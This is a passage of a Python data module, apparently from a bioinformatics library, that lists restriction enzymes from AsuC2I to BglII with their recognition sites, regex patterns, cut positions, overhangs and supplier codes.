'scd3': None,
'scd5': None,
'site': 'CGTRAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Asu14238IV'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCSGG'),
'compsite': '(?=(?P<AsuC2I>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AsuC2I'] = _temp()
def _temp():
return {
'charac': (13, 7, None, None, 'GGTGA'),
'compsite': '(?=(?P<AsuHPI>GGTGA))|(?=(?P<AsuHPI_as>TCACC))',
'dna': None,
'freq': 1024.0,
'fst3': 7,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AsuHPI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<AsuI>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AsuI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<AsuII>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['AsuII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCTAGC'),
'compsite': '(?=(?P<AsuNHI>GCTAGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AsuNHI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGGRAG'),
'compsite': '(?=(?P<AteTI>GGG[AG]AG))|(?=(?P<AteTI_as>CT[CT]CCC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AteTI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<AvaI>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'N', 'Q', 'X'),
}
rest_dict['AvaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<AvaII>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('J', 'N', 'R', 'X'),
}
rest_dict['AvaII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ATGCAT'),
'compsite': '(?=(?P<AvaIII>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AvaIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCTAGG'),
'compsite': '(?=(?P<AvrII>CCTAGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTAGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AvrII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCCRAG'),
'compsite': '(?=(?P<Awo1030IV>GCC[AG]AG))|(?=(?P<Awo1030IV_as>CT[CT]GGC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Awo1030IV'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGG'),
'compsite': '(?=(?P<AxyI>CCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGG',
'size': 7,
'substrat': 'DNA',
'suppl': ('J',),
}
rest_dict['AxyI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GKGCMC'),
'compsite': '(?=(?P<BaeGI>G[GT]GC[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'KGCM',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKGCMC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BaeGI'] = _temp()
def _temp():
return {
'charac': (-10, -26, 23, 7, 'ACNNNNGTAYC'),
'compsite': '(?=(?P<BaeI>AC....GTA[CT]C))|(?=(?P<BaeI_as>G[AG]TAC....GT))',
'dna': None,
'freq': 8192.0,
'fst3': -26,
'fst5': -10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 23,
'site': 'ACNNNNGTAYC',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BaeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCCGAG'),
'compsite': '(?=(?P<Bag18758I>CCCGAG))|(?=(?P<Bag18758I_as>CTCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bag18758I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGGCCA'),
'compsite': '(?=(?P<BalI>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'Q', 'R', 'X'),
}
rest_dict['BalI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGATCC'),
'compsite': '(?=(?P<BamHI>GGATCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['BamHI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<BanI>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N', 'R'),
}
rest_dict['BanI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<BanII>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('K', 'N', 'X'),
}
rest_dict['BanII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RTCAGG'),
'compsite': '(?=(?P<BanLI>[AG]TCAGG))|(?=(?P<BanLI_as>CCTGA[CT]))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTCAGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BanLI'] = _temp()
def _temp():
return {
'charac': (-7, -25, 25, 7, 'GAAGNNNNNNTAC'),
'compsite': '(?=(?P<BarI>GAAG......TAC))|(?=(?P<BarI_as>GTA......CTTC))',
'dna': None,
'freq': 16384.0,
'fst3': -25,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 25,
'site': 'GAAGNNNNNNTAC',
'size': 13,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BarI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTTCAG'),
'compsite': '(?=(?P<Bau1417V>GTTCAG))|(?=(?P<Bau1417V_as>CTGAAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bau1417V'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CACGAG'),
'compsite': '(?=(?P<BauI>CACGAG))|(?=(?P<BauI_as>CTCGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'ACGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BauI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGCGAG'),
'compsite': '(?=(?P<Bbr52II>GGCGAG))|(?=(?P<Bbr52II_as>CTCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bbr52II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTRAAYG'),
'compsite': '(?=(?P<Bbr57III>GT[AG]AA[CT]G))|(?=(?P<Bbr57III_as>C[AG]TT[CT]AC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTRAAYG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bbr57III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGGGAG'),
'compsite': '(?=(?P<Bbr7017II>CGGGAG))|(?=(?P<Bbr7017II_as>CTCCCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bbr7017II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGRCAG'),
'compsite': '(?=(?P<Bbr7017III>GG[AG]CAG))|(?=(?P<Bbr7017III_as>CTG[CT]CC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGRCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bbr7017III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<BbrPI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['BbrPI'] = _temp()
def _temp():
return {
'charac': (8, 6, None, None, 'GAAGAC'),
'compsite': '(?=(?P<BbsI>GAAGAC))|(?=(?P<BbsI_as>GTCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': 6,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BbsI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GNAAYG'),
'compsite': '(?=(?P<BbuB31I>G.AA[CT]G))|(?=(?P<BbuB31I_as>C[AG]TT.C))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GNAAYG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BbuB31I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGRKA'),
'compsite': '(?=(?P<BbuB31II>CG[AG][GT]A))|(?=(?P<BbuB31II_as>T[AC][CT]CG))',
'dna': None,
'freq': 256.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRKA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BbuB31II'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GWGCWC'),
'compsite': '(?=(?P<Bbv12I>G[AT]GC[AT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'WGCW',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GWGCWC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bbv12I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTCAGC'),
'compsite': '(?=(?P<BbvCI>CCTCAGC))|(?=(?P<BbvCI_as>GCTGAGG))',
'dna': None,
'freq': 16384.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTCAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BbvCI'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'GCAGC'),
'compsite': '(?=(?P<BbvI>GCAGC))|(?=(?P<BbvI_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BbvI'] = _temp()
def _temp():
return {
'charac': (8, 6, None, None, 'GAAGAC'),
'compsite': '(?=(?P<BbvII>GAAGAC))|(?=(?P<BbvII_as>GTCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': 6,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BbvII'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'CCATC'),
'compsite': '(?=(?P<BccI>CCATC))|(?=(?P<BccI_as>GATGG))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BccI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TAGGAG'),
'compsite': '(?=(?P<Bce3081I>TAGGAG))|(?=(?P<Bce3081I_as>CTCCTA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bce3081I'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTTGAG'),
'compsite': '(?=(?P<Bce83I>CTTGAG))|(?=(?P<Bce83I_as>CTCAAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bce83I'] = _temp()
def _temp():
return {
'charac': (17, 14, None, None, 'ACGGC'),
'compsite': '(?=(?P<BceAI>ACGGC))|(?=(?P<BceAI_as>GCCGT))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BceAI'] = _temp()
def _temp():
return {
'charac': (-7, -10, 14, 11, 'GCAGC'),
'compsite': '(?=(?P<BceSIV>GCAGC))|(?=(?P<BceSIV_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': -10,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': 11,
'scd5': 14,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BceSIV'] = _temp()
def _temp():
return {
'charac': (17, 13, None, None, 'ACGGC'),
'compsite': '(?=(?P<BcefI>ACGGC))|(?=(?P<BcefI_as>GCCGT))',
'dna': None,
'freq': 1024.0,
'fst3': 13,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGGC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BcefI'] = _temp()
def _temp():
return {
'charac': (-10, -24, 24, 10, 'CGANNNNNNTGC'),
'compsite': '(?=(?P<BcgI>CGA......TGC))|(?=(?P<BcgI_as>GCA......TCG))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 24,
'site': 'CGANNNNNNTGC',
'size': 12,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BcgI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCWGG'),
'compsite': '(?=(?P<BciT130I>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'W',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['BciT130I'] = _temp()
def _temp():
return {
'charac': (12, 5, None, None, 'GTATCC'),
'compsite': '(?=(?P<BciVI>GTATCC))|(?=(?P<BciVI_as>GGATAC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BciVI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGATCA'),
'compsite': '(?=(?P<BclI>TGATCA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGATCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'J', 'M', 'N', 'O', 'R', 'S'),
}
rest_dict['BclI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCSGG'),
'compsite': '(?=(?P<BcnI>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['BcnI'] = _temp()
def _temp():
return {
'charac': (6, 5, None, None, 'GTCTC'),
'compsite': '(?=(?P<BcoDI>GTCTC))|(?=(?P<BcoDI_as>GAGAC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BcoDI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACTAGT'),
'compsite': '(?=(?P<BcuI>ACTAGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTAGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BcuI'] = _temp()
def _temp():
return {
'charac': (-10, -24, 24, 10, 'TGANNNNNNTCA'),
'compsite': '(?=(?P<BdaI>TGA......TCA))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 24,
'site': 'TGANNNNNNTCA',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BdaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'WCCGGW'),
'compsite': '(?=(?P<BetI>[AT]CCGG[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WCCGGW',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BetI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<BfaI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BfaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GANGGAG'),
'compsite': '(?=(?P<BfaSII>GA.GGAG))|(?=(?P<BfaSII_as>CTCC.TC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GANGGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BfaSII'] = _temp()
def _temp():
return {
'charac': (11, 4, None, None, 'ACTGGG'),
'compsite': '(?=(?P<BfiI>ACTGGG))|(?=(?P<BfiI_as>CCCAGT))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BfiI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTRYAG'),
'compsite': '(?=(?P<BfmI>CT[AG][CT]AG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TRYA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRYAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BfmI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RGCGCY'),
'compsite': '(?=(?P<BfoI>[AG]GCGC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCGCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BfoI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<BfrI>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['BfrI'] = _temp()
def _temp():
return {
'charac': (10, 8, None, None, 'ACCTGC'),
'compsite': '(?=(?P<BfuAI>ACCTGC))|(?=(?P<BfuAI_as>GCAGGT))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCTGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BfuAI'] = _temp()
def _temp():
return {
'charac': (12, 5, None, None, 'GTATCC'),
'compsite': '(?=(?P<BfuI>GTATCC))|(?=(?P<BfuI_as>GGATAC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BfuI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTRAAG'),
'compsite': '(?=(?P<Bga514I>GT[AG]AAG))|(?=(?P<Bga514I_as>CTT[CT]AC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTRAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bga514I'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GCCNNNNNGGC'),
'compsite': '(?=(?P<BglI>GCC.....GGC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCNNNNNGGC',
'size': 11,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'N', 'O', 'Q', 'R', 'V', 'X'),
}
rest_dict['BglI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'AGATCT'),
'compsite': '(?=(?P<BglII>AGATCT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGATCT',
'size': 6,
'substrat': 'DNA',
